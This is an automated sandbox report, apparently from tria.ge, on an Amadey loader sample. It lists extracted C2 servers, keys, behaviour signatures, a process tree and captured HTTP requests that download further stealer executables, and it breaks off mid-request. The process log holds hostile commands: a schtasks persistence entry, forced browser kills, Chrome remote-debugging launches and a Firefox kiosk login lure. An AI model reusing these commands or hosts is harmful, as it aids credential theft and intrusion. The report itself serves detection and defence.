Windows 7 deprecation

Windows 7 will be removed from tria.ge on 2025-03-31

Analysis

  • max time kernel
    150s
  • max time network
    150s
  • platform
    windows7_x64
  • resource
    win7-20240903-en
  • resource tags

    arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system
  • submitted
    26/11/2024, 01:58 UTC

General

  • Target

    4aa590b050b7b8d4f8b2ed95b93347e9f27151bd78430aa57ec787090641bcd5.exe

  • Size

    1.8MB

  • MD5

    9fd900925845d15e207472ae62b14c76

  • SHA1

    c3f573f549ed539e9bd286b5563d850394331684

  • SHA256

    4aa590b050b7b8d4f8b2ed95b93347e9f27151bd78430aa57ec787090641bcd5

  • SHA512

    1e3b4a30c3e5691ebe788237f646a8cb92b0728da6ac31985bf2fd01db0666a552ec9f78793d244de7120afc71b11362036fc158c4e8d9523929bb6dc67caff8

  • SSDEEP

    49152:bEonAoXgvlPy5UbRs1dII0LEgHEzjjsJ9k8d:bEoCvlnKdII01k8

Malware Config

Extracted

Family

amadey

Version

4.42

Botnet

9c9aa5

C2

http://185.215.113.43

Attributes
  • install_dir

    abc3bc1985

  • install_file

    skotes.exe

  • strings_key

    8a35cf2ea38c2817dba29a4b5b25dcf0

  • url_paths

    /Zu7JuNko/index.php

rc4.plain
1
006700e5a2ab05704bbb0c589b88924d

Extracted

Family

stealc

Botnet

mars

C2

http://185.215.113.206

Attributes
  • url_path

    /c4becf79229cb002.php

Signatures

  • Amadey

    Amadey bot is a simple trojan bot primarily used for collecting reconnaissance information.

  • Amadey family
  • CryptBot

    CryptBot is a C++ stealer distributed widely in bundle with other software.

  • Cryptbot family
  • Detect Poverty Stealer Payload 1 IoCs
  • Detects CryptBot payload 1 IoCs

    CryptBot is a C++ stealer distributed widely in bundle with other software.

  • Poverty Stealer

    Poverty Stealer is a crypto and infostealer written in C++.

  • Povertystealer family
  • Stealc

    Stealc is an infostealer written in C++.

  • Stealc family
  • Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 5 IoCs
  • Downloads MZ/PE file
  • Uses browser remote debugging 2 TTPs 4 IoCs

    Can be used control the browser and steal sensitive information such as credentials and session cookies.

  • Checks BIOS information in registry 2 TTPs 10 IoCs

    BIOS information is often read in order to detect sandboxing environments.

  • Executes dropped EXE 8 IoCs
  • Identifies Wine through registry keys 2 TTPs 5 IoCs

    Wine is a compatibility layer capable of running Windows applications, which can be used as sandboxing environment.

  • Loads dropped DLL 16 IoCs
  • Reads user/profile data of web browsers 3 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Adds Run key to start application 2 TTPs 3 IoCs
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • AutoIT Executable 1 IoCs

    AutoIT scripts compiled to PE executables.

  • Suspicious use of NtSetInformationThreadHideFromDebugger 5 IoCs
  • Drops file in Windows directory 1 IoCs
  • Browser Information Discovery 1 TTPs

    Enumerate browser information.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Program crash 1 IoCs
  • System Location Discovery: System Language Discovery 1 TTPs 13 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

  • Checks processor information in registry 2 TTPs 8 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Enumerates system info in registry 2 TTPs 3 IoCs
  • Kills process with taskkill 5 IoCs
  • Modifies registry class 1 IoCs
  • Modifies system certificate store 2 TTPs 3 IoCs
  • Scheduled Task/Job: Scheduled Task 1 TTPs 1 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Suspicious behavior: EnumeratesProcesses 9 IoCs
  • Suspicious use of AdjustPrivilegeToken 11 IoCs
  • Suspicious use of FindShellTrayWindow 49 IoCs
  • Suspicious use of SendNotifyMessage 13 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

Processes

  • C:\Users\Admin\AppData\Local\Temp\4aa590b050b7b8d4f8b2ed95b93347e9f27151bd78430aa57ec787090641bcd5.exe
    "C:\Users\Admin\AppData\Local\Temp\4aa590b050b7b8d4f8b2ed95b93347e9f27151bd78430aa57ec787090641bcd5.exe"
    1⤵
    • Identifies VirtualBox via ACPI registry values (likely anti-VM)
    • Checks BIOS information in registry
    • Identifies Wine through registry keys
    • Loads dropped DLL
    • Suspicious use of NtSetInformationThreadHideFromDebugger
    • Drops file in Windows directory
    • System Location Discovery: System Language Discovery
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of FindShellTrayWindow
    • Suspicious use of WriteProcessMemory
    PID:2472
    • C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe
      "C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe"
      2⤵
      • Identifies VirtualBox via ACPI registry values (likely anti-VM)
      • Checks BIOS information in registry
      • Executes dropped EXE
      • Identifies Wine through registry keys
      • Loads dropped DLL
      • Adds Run key to start application
      • Suspicious use of NtSetInformationThreadHideFromDebugger
      • System Location Discovery: System Language Discovery
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of WriteProcessMemory
      PID:2952
      • C:\Users\Admin\AppData\Local\Temp\1009157001\1Shasou.exe
        "C:\Users\Admin\AppData\Local\Temp\1009157001\1Shasou.exe"
        3⤵
        • Executes dropped EXE
        • System Location Discovery: System Language Discovery
        PID:2044
      • C:\Users\Admin\AppData\Local\Temp\1009175001\ba9783936d.exe
        "C:\Users\Admin\AppData\Local\Temp\1009175001\ba9783936d.exe"
        3⤵
        • Identifies VirtualBox via ACPI registry values (likely anti-VM)
        • Checks BIOS information in registry
        • Executes dropped EXE
        • Identifies Wine through registry keys
        • Loads dropped DLL
        • Suspicious use of NtSetInformationThreadHideFromDebugger
        • System Location Discovery: System Language Discovery
        • Checks processor information in registry
        • Suspicious behavior: EnumeratesProcesses
        PID:1972
        • C:\Program Files\Google\Chrome\Application\chrome.exe
          "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9222 --profile-directory="Default"
          4⤵
          • Uses browser remote debugging
          • Enumerates system info in registry
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          • Suspicious use of FindShellTrayWindow
          PID:3468
          • C:\Program Files\Google\Chrome\Application\chrome.exe
            "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=106.0.5249.119 --initial-client-data=0xc0,0xc4,0xc8,0x94,0xcc,0x7fef45b9758,0x7fef45b9768,0x7fef45b9778
            5⤵
              PID:3480
            • C:\Windows\system32\ctfmon.exe
              ctfmon.exe
              5⤵
                PID:3592
              • C:\Program Files\Google\Chrome\Application\chrome.exe
                "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1176 --field-trial-handle=1296,i,18364658200965414235,17413037429063973466,131072 /prefetch:2
                5⤵
                  PID:3656
                • C:\Program Files\Google\Chrome\Application\chrome.exe
                  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1500 --field-trial-handle=1296,i,18364658200965414235,17413037429063973466,131072 /prefetch:8
                  5⤵
                    PID:3672
                  • C:\Program Files\Google\Chrome\Application\chrome.exe
                    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=1624 --field-trial-handle=1296,i,18364658200965414235,17413037429063973466,131072 /prefetch:8
                    5⤵
                      PID:3696
                    • C:\Program Files\Google\Chrome\Application\chrome.exe
                      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --first-renderer-process --remote-debugging-port=9222 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --mojo-platform-channel-handle=1616 --field-trial-handle=1296,i,18364658200965414235,17413037429063973466,131072 /prefetch:1
                      5⤵
                      • Uses browser remote debugging
                      PID:3920
                    • C:\Program Files\Google\Chrome\Application\chrome.exe
                      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --remote-debugging-port=9222 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --mojo-platform-channel-handle=2348 --field-trial-handle=1296,i,18364658200965414235,17413037429063973466,131072 /prefetch:1
                      5⤵
                      • Uses browser remote debugging
                      PID:3948
                    • C:\Program Files\Google\Chrome\Application\chrome.exe
                      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=angle --use-angle=swiftshader-webgl --mojo-platform-channel-handle=3284 --field-trial-handle=1296,i,18364658200965414235,17413037429063973466,131072 /prefetch:2
                      5⤵
                        PID:3248
                      • C:\Program Files\Google\Chrome\Application\chrome.exe
                        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --remote-debugging-port=9222 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --mojo-platform-channel-handle=1444 --field-trial-handle=1296,i,18364658200965414235,17413037429063973466,131072 /prefetch:1
                        5⤵
                        • Uses browser remote debugging
                        PID:3340
                    • C:\Users\Admin\AppData\Local\Temp\service123.exe
                      "C:\Users\Admin\AppData\Local\Temp\service123.exe"
                      4⤵
                      • Executes dropped EXE
                      • Loads dropped DLL
                      PID:3152
                    • C:\Windows\SysWOW64\schtasks.exe
                      "C:\Windows\System32\schtasks.exe" /create /tn "ServiceData4" /tr "C:\Users\Admin\AppData\Local\Temp\/service123.exe" /st 00:01 /du 9800:59 /sc once /ri 1 /f
                      4⤵
                      • System Location Discovery: System Language Discovery
                      • Scheduled Task/Job: Scheduled Task
                      PID:4044
                    • C:\Windows\SysWOW64\WerFault.exe
                      C:\Windows\SysWOW64\WerFault.exe -u -p 1972 -s 964
                      4⤵
                      • Loads dropped DLL
                      • Program crash
                      PID:3780
                  • C:\Users\Admin\AppData\Local\Temp\1009176001\72c1b8c8ee.exe
                    "C:\Users\Admin\AppData\Local\Temp\1009176001\72c1b8c8ee.exe"
                    3⤵
                    • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                    • Checks BIOS information in registry
                    • Executes dropped EXE
                    • Identifies Wine through registry keys
                    • Suspicious use of NtSetInformationThreadHideFromDebugger
                    • System Location Discovery: System Language Discovery
                    • Modifies system certificate store
                    • Suspicious behavior: EnumeratesProcesses
                    PID:2824
                  • C:\Users\Admin\AppData\Local\Temp\1009177001\f8bcf7e83e.exe
                    "C:\Users\Admin\AppData\Local\Temp\1009177001\f8bcf7e83e.exe"
                    3⤵
                    • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                    • Checks BIOS information in registry
                    • Executes dropped EXE
                    • Identifies Wine through registry keys
                    • Suspicious use of NtSetInformationThreadHideFromDebugger
                    • System Location Discovery: System Language Discovery
                    • Suspicious behavior: EnumeratesProcesses
                    PID:1548
                  • C:\Users\Admin\AppData\Local\Temp\1009178001\3acce6d1d3.exe
                    "C:\Users\Admin\AppData\Local\Temp\1009178001\3acce6d1d3.exe"
                    3⤵
                    • Executes dropped EXE
                    • System Location Discovery: System Language Discovery
                    • Suspicious behavior: EnumeratesProcesses
                    • Suspicious use of FindShellTrayWindow
                    • Suspicious use of SendNotifyMessage
                    • Suspicious use of WriteProcessMemory
                    PID:2884
                    • C:\Windows\SysWOW64\taskkill.exe
                      taskkill /F /IM firefox.exe /T
                      4⤵
                      • System Location Discovery: System Language Discovery
                      • Kills process with taskkill
                      • Suspicious use of AdjustPrivilegeToken
                      PID:2324
                    • C:\Windows\SysWOW64\taskkill.exe
                      taskkill /F /IM chrome.exe /T
                      4⤵
                      • System Location Discovery: System Language Discovery
                      • Kills process with taskkill
                      • Suspicious use of AdjustPrivilegeToken
                      PID:3028
                    • C:\Windows\SysWOW64\taskkill.exe
                      taskkill /F /IM msedge.exe /T
                      4⤵
                      • System Location Discovery: System Language Discovery
                      • Kills process with taskkill
                      • Suspicious use of AdjustPrivilegeToken
                      PID:2872
                    • C:\Windows\SysWOW64\taskkill.exe
                      taskkill /F /IM opera.exe /T
                      4⤵
                      • System Location Discovery: System Language Discovery
                      • Kills process with taskkill
                      • Suspicious use of AdjustPrivilegeToken
                      PID:2236
                    • C:\Windows\SysWOW64\taskkill.exe
                      taskkill /F /IM brave.exe /T
                      4⤵
                      • System Location Discovery: System Language Discovery
                      • Kills process with taskkill
                      • Suspicious use of AdjustPrivilegeToken
                      PID:1260
                    • C:\Program Files\Mozilla Firefox\firefox.exe
                      "C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk "https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd" --no-default-browser-check --disable-popup-blocking
                      4⤵
                      • Suspicious use of WriteProcessMemory
                      PID:1684
                      • C:\Program Files\Mozilla Firefox\firefox.exe
                        "C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd --no-default-browser-check --disable-popup-blocking
                        5⤵
                        • Checks processor information in registry
                        • Modifies registry class
                        • Suspicious use of AdjustPrivilegeToken
                        • Suspicious use of FindShellTrayWindow
                        • Suspicious use of SendNotifyMessage
                        • Suspicious use of WriteProcessMemory
                        PID:2300
                        • C:\Program Files\Mozilla Firefox\firefox.exe
                          "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="2300.0.1521835580\443173919" -parentBuildID 20221007134813 -prefsHandle 1232 -prefMapHandle 1224 -prefsLen 20847 -prefMapSize 233444 -appDir "C:\Program Files\Mozilla Firefox\browser" - {aa605ca8-296e-496f-be7e-36a2b5d48381} 2300 "\\.\pipe\gecko-crash-server-pipe.2300" 1316 123d7f58 gpu
                          6⤵
                            PID:2388
                          • C:\Program Files\Mozilla Firefox\firefox.exe
                            "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="2300.1.559574119\949255133" -parentBuildID 20221007134813 -prefsHandle 1500 -prefMapHandle 1496 -prefsLen 21708 -prefMapSize 233444 -appDir "C:\Program Files\Mozilla Firefox\browser" - {cc05fc4a-277c-4218-bfe7-302f8d128afc} 2300 "\\.\pipe\gecko-crash-server-pipe.2300" 1512 d73c58 socket
                            6⤵
                              PID:2916
                            • C:\Program Files\Mozilla Firefox\firefox.exe
                              "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="2300.2.2051334069\1650073809" -childID 1 -isForBrowser -prefsHandle 2052 -prefMapHandle 2044 -prefsLen 21746 -prefMapSize 233444 -jsInitHandle 836 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {729d9f6e-9e4e-467c-ba01-17836d18780a} 2300 "\\.\pipe\gecko-crash-server-pipe.2300" 2064 1a887758 tab
                              6⤵
                                PID:2308
                              • C:\Program Files\Mozilla Firefox\firefox.exe
                                "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="2300.3.2049559314\1488355387" -childID 2 -isForBrowser -prefsHandle 2888 -prefMapHandle 2884 -prefsLen 26216 -prefMapSize 233444 -jsInitHandle 836 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {b218cbc5-69f3-486c-8449-ccf877569488} 2300 "\\.\pipe\gecko-crash-server-pipe.2300" 2900 1d432c58 tab
                                6⤵
                                  PID:1640
                                • C:\Program Files\Mozilla Firefox\firefox.exe
                                  "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="2300.4.993723458\1787661929" -childID 3 -isForBrowser -prefsHandle 3780 -prefMapHandle 2536 -prefsLen 26275 -prefMapSize 233444 -jsInitHandle 836 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {70692aef-9ef4-4b59-a2a0-8b43347af842} 2300 "\\.\pipe\gecko-crash-server-pipe.2300" 3792 1dcd9858 tab
                                  6⤵
                                    PID:2008
                                  • C:\Program Files\Mozilla Firefox\firefox.exe
                                    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="2300.5.814965571\1384495021" -childID 4 -isForBrowser -prefsHandle 3900 -prefMapHandle 3904 -prefsLen 26275 -prefMapSize 233444 -jsInitHandle 836 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {65bd3964-ec30-4ad2-b2bd-af28c256b23d} 2300 "\\.\pipe\gecko-crash-server-pipe.2300" 3888 20d0a258 tab
                                    6⤵
                                      PID:2276
                                    • C:\Program Files\Mozilla Firefox\firefox.exe
                                      "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="2300.6.1795743630\1988258589" -childID 5 -isForBrowser -prefsHandle 4064 -prefMapHandle 4068 -prefsLen 26275 -prefMapSize 233444 -jsInitHandle 836 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {b980f757-a634-45be-aeb1-80a9ef2575ea} 2300 "\\.\pipe\gecko-crash-server-pipe.2300" 4052 20d07858 tab
                                      6⤵
                                        PID:2960
                            • C:\Program Files\Google\Chrome\Application\106.0.5249.119\elevation_service.exe
                              "C:\Program Files\Google\Chrome\Application\106.0.5249.119\elevation_service.exe"
                              1⤵
                                PID:3956
                              • C:\Windows\system32\taskeng.exe
                                taskeng.exe {C687DA26-3FD5-492D-9541-C62DC3EE0EAE} S-1-5-21-4177215427-74451935-3209572229-1000:JSMURNPT\Admin:Interactive:[1]
                                1⤵
                                  PID:3668
                                  • C:\Users\Admin\AppData\Local\Temp\service123.exe
                                    C:\Users\Admin\AppData\Local\Temp\/service123.exe
                                    2⤵
                                    • Executes dropped EXE
                                    • Loads dropped DLL
                                    PID:3760

                                Network

                                • flag-ru
                                  POST
                                  http://185.215.113.43/Zu7JuNko/index.php
                                  skotes.exe
                                  Remote address:
                                  185.215.113.43:80
                                  Request
                                  POST /Zu7JuNko/index.php HTTP/1.1
                                  Content-Type: application/x-www-form-urlencoded
                                  Host: 185.215.113.43
                                  Content-Length: 4
                                  Cache-Control: no-cache
                                  Response
                                  HTTP/1.1 200 OK
                                  Server: nginx/1.18.0 (Ubuntu)
                                  Date: Tue, 26 Nov 2024 01:58:14 GMT
                                  Content-Type: text/html; charset=UTF-8
                                  Transfer-Encoding: chunked
                                  Connection: keep-alive
                                  Refresh: 0; url = Login.php
                                • flag-ru
                                  POST
                                  http://185.215.113.43/Zu7JuNko/index.php
                                  skotes.exe
                                  Remote address:
                                  185.215.113.43:80
                                  Request
                                  POST /Zu7JuNko/index.php HTTP/1.1
                                  Content-Type: application/x-www-form-urlencoded
                                  Host: 185.215.113.43
                                  Content-Length: 156
                                  Cache-Control: no-cache
                                  Response
                                  HTTP/1.1 200 OK
                                  Server: nginx/1.18.0 (Ubuntu)
                                  Date: Tue, 26 Nov 2024 01:58:15 GMT
                                  Content-Type: text/html; charset=UTF-8
                                  Transfer-Encoding: chunked
                                  Connection: keep-alive
                                • flag-ru
                                  POST
                                  http://185.215.113.43/Zu7JuNko/index.php
                                  skotes.exe
                                  Remote address:
                                  185.215.113.43:80
                                  Request
                                  POST /Zu7JuNko/index.php HTTP/1.1
                                  Content-Type: application/x-www-form-urlencoded
                                  Host: 185.215.113.43
                                  Content-Length: 31
                                  Cache-Control: no-cache
                                  Response
                                  HTTP/1.1 200 OK
                                  Server: nginx/1.18.0 (Ubuntu)
                                  Date: Tue, 26 Nov 2024 01:58:18 GMT
                                  Content-Type: text/html; charset=UTF-8
                                  Transfer-Encoding: chunked
                                  Connection: keep-alive
                                • flag-ru
                                  POST
                                  http://185.215.113.43/Zu7JuNko/index.php
                                  skotes.exe
                                  Remote address:
                                  185.215.113.43:80
                                  Request
                                  POST /Zu7JuNko/index.php HTTP/1.1
                                  Content-Type: application/x-www-form-urlencoded
                                  Host: 185.215.113.43
                                  Content-Length: 31
                                  Cache-Control: no-cache
                                  Response
                                  HTTP/1.1 200 OK
                                  Server: nginx/1.18.0 (Ubuntu)
                                  Date: Tue, 26 Nov 2024 01:58:25 GMT
                                  Content-Type: text/html; charset=UTF-8
                                  Transfer-Encoding: chunked
                                  Connection: keep-alive
                                • flag-ru
                                  POST
                                  http://185.215.113.43/Zu7JuNko/index.php
                                  skotes.exe
                                  Remote address:
                                  185.215.113.43:80
                                  Request
                                  POST /Zu7JuNko/index.php HTTP/1.1
                                  Content-Type: application/x-www-form-urlencoded
                                  Host: 185.215.113.43
                                  Content-Length: 31
                                  Cache-Control: no-cache
                                  Response
                                  HTTP/1.1 200 OK
                                  Server: nginx/1.18.0 (Ubuntu)
                                  Date: Tue, 26 Nov 2024 01:58:30 GMT
                                  Content-Type: text/html; charset=UTF-8
                                  Transfer-Encoding: chunked
                                  Connection: keep-alive
                                • flag-ru
                                  POST
                                  http://185.215.113.43/Zu7JuNko/index.php
                                  skotes.exe
                                  Remote address:
                                  185.215.113.43:80
                                  Request
                                  POST /Zu7JuNko/index.php HTTP/1.1
                                  Content-Type: application/x-www-form-urlencoded
                                  Host: 185.215.113.43
                                  Content-Length: 31
                                  Cache-Control: no-cache
                                  Response
                                  HTTP/1.1 200 OK
                                  Server: nginx/1.18.0 (Ubuntu)
                                  Date: Tue, 26 Nov 2024 01:58:33 GMT
                                  Content-Type: text/html; charset=UTF-8
                                  Transfer-Encoding: chunked
                                  Connection: keep-alive
                                • flag-ru
                                  POST
                                  http://185.215.113.43/Zu7JuNko/index.php
                                  skotes.exe
                                  Remote address:
                                  185.215.113.43:80
                                  Request
                                  POST /Zu7JuNko/index.php HTTP/1.1
                                  Content-Type: application/x-www-form-urlencoded
                                  Host: 185.215.113.43
                                  Content-Length: 31
                                  Cache-Control: no-cache
                                  Response
                                  HTTP/1.1 200 OK
                                  Server: nginx/1.18.0 (Ubuntu)
                                  Date: Tue, 26 Nov 2024 01:58:37 GMT
                                  Content-Type: text/html; charset=UTF-8
                                  Transfer-Encoding: chunked
                                  Connection: keep-alive
                                • flag-ru
                                  POST
                                  http://185.215.113.43/Zu7JuNko/index.php
                                  skotes.exe
                                  Remote address:
                                  185.215.113.43:80
                                  Request
                                  POST /Zu7JuNko/index.php HTTP/1.1
                                  Content-Type: application/x-www-form-urlencoded
                                  Host: 185.215.113.43
                                  Content-Length: 31
                                  Cache-Control: no-cache
                                  Response
                                  HTTP/1.1 200 OK
                                  Server: nginx/1.18.0 (Ubuntu)
                                  Date: Tue, 26 Nov 2024 01:59:24 GMT
                                  Content-Type: text/html; charset=UTF-8
                                  Transfer-Encoding: chunked
                                  Connection: keep-alive
                                • flag-ru
                                  GET
                                  http://31.41.244.11/files/7407486059/1Shasou.exe
                                  skotes.exe
                                  Remote address:
                                  31.41.244.11:80
                                  Request
                                  GET /files/7407486059/1Shasou.exe HTTP/1.1
                                  Host: 31.41.244.11
                                  Response
                                  HTTP/1.1 200 OK
                                  Server: nginx/1.18.0 (Ubuntu)
                                  Date: Tue, 26 Nov 2024 01:58:16 GMT
                                  Content-Type: application/octet-stream
                                  Content-Length: 30208
                                  Last-Modified: Tue, 26 Nov 2024 00:13:04 GMT
                                  Connection: keep-alive
                                  ETag: "67451290-7600"
                                  Accept-Ranges: bytes
                                • flag-ru
                                  GET
                                  http://31.41.244.11/files/random.exe
                                  skotes.exe
                                  Remote address:
                                  31.41.244.11:80
                                  Request
                                  GET /files/random.exe HTTP/1.1
                                  Host: 31.41.244.11
                                  Response
                                  HTTP/1.1 200 OK
                                  Server: nginx/1.18.0 (Ubuntu)
                                  Date: Tue, 26 Nov 2024 01:58:18 GMT
                                  Content-Type: application/octet-stream
                                  Content-Length: 4375040
                                  Last-Modified: Mon, 25 Nov 2024 21:29:06 GMT
                                  Connection: keep-alive
                                  ETag: "6744ec22-42c200"
                                  Accept-Ranges: bytes
                                • flag-us
                                  DNS
                                  home.fvtekk5pn.top
                                  ba9783936d.exe
                                  Remote address:
                                  8.8.8.8:53
                                  Request
                                  home.fvtekk5pn.top
                                  IN A
                                  Response
                                • flag-us
                                  DNS
                                  home.fvtekk5pn.top
                                  ba9783936d.exe
                                  Remote address:
                                  8.8.8.8:53
                                  Request
                                  home.fvtekk5pn.top
                                  IN AAAA
                                  Response
                                  home.fvtekk5pn.top
                                  IN A
                                  34.116.198.130
                                • flag-pl
                                  GET
                                  http://home.fvtekk5pn.top/LCXOUUtXgrKhKDLYSbzW1732019347
                                  ba9783936d.exe
                                  Remote address:
                                  34.116.198.130:80
                                  Request
                                  GET /LCXOUUtXgrKhKDLYSbzW1732019347 HTTP/1.1
                                  Host: home.fvtekk5pn.top
                                  Accept: */*
                                  Response
                                  HTTP/1.1 200 OK
                                  server: nginx/1.22.1
                                  date: Tue, 26 Nov 2024 01:58:24 GMT
                                  content-type: application/octet-stream
                                  content-length: 10815536
                                  content-disposition: attachment; filename="36EpLiutqfXtaXMkXOTru;"
                                  last-modified: Tue, 19 Nov 2024 12:29:07 GMT
                                  cache-control: no-cache
                                  etag: "1732019347.4431374-10815536-3919321515"
                                • flag-ru
                                  GET
                                  http://185.215.113.16/luma/random.exe
                                  skotes.exe
                                  Remote address:
                                  185.215.113.16:80
                                  Request
                                  GET /luma/random.exe HTTP/1.1
                                  Host: 185.215.113.16
                                  Response
                                  HTTP/1.1 200 OK
                                  Server: nginx/1.18.0 (Ubuntu)
                                  Date: Tue, 26 Nov 2024 01:58:25 GMT
                                  Content-Type: application/octet-stream
                                  Content-Length: 1852928
                                  Last-Modified: Tue, 26 Nov 2024 01:26:08 GMT
                                  Connection: keep-alive
                                  ETag: "674523b0-1c4600"
                                  Accept-Ranges: bytes
                                • flag-ru
                                  GET
                                  http://185.215.113.16/steam/random.exe
                                  skotes.exe
                                  Remote address:
                                  185.215.113.16:80
                                  Request
                                  GET /steam/random.exe HTTP/1.1
                                  Host: 185.215.113.16
                                  Response
                                  HTTP/1.1 200 OK
                                  Server: nginx/1.18.0 (Ubuntu)
                                  Date: Tue, 26 Nov 2024 01:58:30 GMT
                                  Content-Type: application/octet-stream
                                  Content-Length: 1796608
                                  Last-Modified: Tue, 26 Nov 2024 01:26:15 GMT
                                  Connection: keep-alive
                                  ETag: "674523b7-1b6a00"
                                  Accept-Ranges: bytes
                                • flag-ru
                                  GET
                                  http://185.215.113.16/well/random.exe
                                  skotes.exe
                                  Remote address:
                                  185.215.113.16:80
                                  Request
                                  GET /well/random.exe HTTP/1.1
                                  Host: 185.215.113.16
                                  Response
                                  HTTP/1.1 200 OK
                                  Server: nginx/1.18.0 (Ubuntu)
                                  Date: Tue, 26 Nov 2024 01:58:33 GMT
                                  Content-Type: application/octet-stream
                                  Content-Length: 923136
                                  Last-Modified: Tue, 26 Nov 2024 01:24:22 GMT
                                  Connection: keep-alive
                                  ETag: "67452346-e1600"
                                  Accept-Ranges: bytes
                                • flag-ru
                                  GET
                                  http://185.215.113.16/off/random.exe
                                  skotes.exe
                                  Remote address:
                                  185.215.113.16:80
                                  Request
                                  GET /off/random.exe HTTP/1.1
                                  Host: 185.215.113.16
                                  Response
                                  HTTP/1.1 200 OK
                                  Server: nginx/1.18.0 (Ubuntu)
                                  Date: Tue, 26 Nov 2024 01:58:37 GMT
                                  Content-Type: application/octet-stream
                                  Content-Length: 2793472
                                  Last-Modified: Tue, 26 Nov 2024 01:24:48 GMT
                                  Connection: keep-alive
                                  ETag: "67452360-2aa000"
                                  Accept-Ranges: bytes
                                • flag-us
                                  DNS
                                  property-imper.sbs
                                  72c1b8c8ee.exe
                                  Remote address:
                                  8.8.8.8:53
                                  Request
                                  property-imper.sbs
                                  IN A
                                  Response
                                • flag-us
                                  DNS
                                  frogs-severz.sbs
                                  72c1b8c8ee.exe
                                  Remote address:
                                  8.8.8.8:53
                                  Request
                                  frogs-severz.sbs
                                  IN A
                                  Response
                                • flag-us
                                  DNS
                                  occupy-blushi.sbs
                                  72c1b8c8ee.exe
                                  Remote address:
                                  8.8.8.8:53
                                  Request
                                  occupy-blushi.sbs
                                  IN A
                                  Response
                                  occupy-blushi.sbs
                                  IN A
                                  104.21.7.169
                                  occupy-blushi.sbs
                                  IN A
                                  172.67.187.240
                                • flag-us
                                  POST
                                  https://occupy-blushi.sbs/api
                                  72c1b8c8ee.exe
                                  Remote address:
                                  104.21.7.169:443
                                  Request
